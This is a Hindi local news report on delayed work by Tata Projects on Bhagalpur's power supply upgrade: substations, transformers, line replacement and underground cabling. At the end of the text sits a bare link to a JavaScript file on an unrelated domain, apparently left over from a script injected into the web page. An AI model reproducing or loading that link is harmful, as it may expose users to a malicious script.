भागलपुर,( कुलसूम फात्मा ) भागलपुर में 24 घंटे निर्बाध बिजली सप्लाई की जा सके। इस बाबत कवायद चल रही है। विद्युत उपकेंद्र तार बिछाने के कार्य को बहुत धीमी गति से चलने के कारण डिपार्टमेंट ने खफ्गी जताई है। एग्रीमेंट के अनुसार यदि हम बात करें तो समय पर कार्य पूर्ण नहीं करने पर एजेंसी टाटा प्रोजेक्ट के अधिकारियों को नोटिस भेजकर कार्रवाई की जाएगी और कार्यवाही की जाएगी चेतावनी भी दी गई है।

 

भागलपुर में निर्बाध बिजली आपूर्ति के लिए तकरीबन 260 करोड़ की व्यय हो रहा है और उप केंद्र कंस्ट्रक्शन पुराने उप केंद्र फीडरों को अलग कर के नए उप केंद्र से जोड़ने और उप केंद्रों के पावर ट्रांसफार्मरों के पावर को बढ़ाया जाएगा तथा 33000 और 11000 वोल्ट के तार बदले जाएंगे। कई जगह पर अंडर ग्राउंड तार भी बिछाए जाएंगे। कोटेदार लगाने के साथ-साथ क्रॉसिंग एरिया में तारों को ऊंचा करा जाएगा।

 

सभी जगह दो से 100 केवीए का ट्रांसफार्मर लगाने का कार्य चल रहा है। इस कार्य का ठेका वर्तमान समय में टाटा प्रोजेक्ट को दिया गया है। एग्रीमेंट में मेन्शन हुआ है की एजेंसी को अप्रैल से मई तक के कार्य को पूरा कर लेना है, परंतु अब तक 50% भी कार्य पूरा नहीं किया जा सका है। डिपार्टमेंट अधिकारियों ने कहा की भीखनपुर आरबीएस रोड स्थित पुराना बिजली कार्यालय विद्युत उपकेंद्र का कार्य तकरीबन 75% वर्तमान समय में किया जा चुका है।

 

 

 

परंतु नाथ नगर सिटी लोदीपुर इंजीनियरिंग कॉलेज मेडिकल कॉलेज इन उप केंद्र का कार्य अभी भी चल रहा है। काम बहुत ही धीमी गति से हो रहा है। लग नहीं रहा है की यह कार सही समय पर पूर्ण हो जाएगा। वहीं दूसरी ओर केबल का कार्य भी 11 तथा 33000 वोल्ट तार बदलने का बहुत धीमी रफ्तार से चल रहा है। ऐसे में अगले वर्ष की जनवरी या फरवरी से पूर्व कार्य पूर्ण होने की उम्मीद नहीं नजर आ रही है।

 

 

 

हालांकि टीएनबी कॉलेजिएट स्कूल में बनने वाले उप केंद्र के लिए जमीन अभी भी उपलब्ध नहीं कराई गई है। बता दें की इंटीग्रेटेड पावर डेवलपमेंट स्कीम के अनुसार पुराने तारों को बदलने तथा कई मुख्य जगहों में अंडर ग्राउंड तार बिछाने और क्रॉसिंग के स्थान पर तार को ऊपर करने के लिए पोल को ऊंचा करने के साथ साथ प्रतिमा विसर्जन मार्गों में अंडर ग्राउंड तार बिछाने के लिए साथ ही कतार को लगाने और शिव केंद्र बनाने के कार्य का प्रोजेक्ट टाटा प्रोजेक्ट को दिया गया है। यह कार्य की गति को देखकर मुख्यालय ने काफी नाराजगी जाहिर की है। समय पर कार्य को पूर्ण नहीं करने पर टाटा प्रोजेक्ट पर कार्यवाही की जाएगी।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.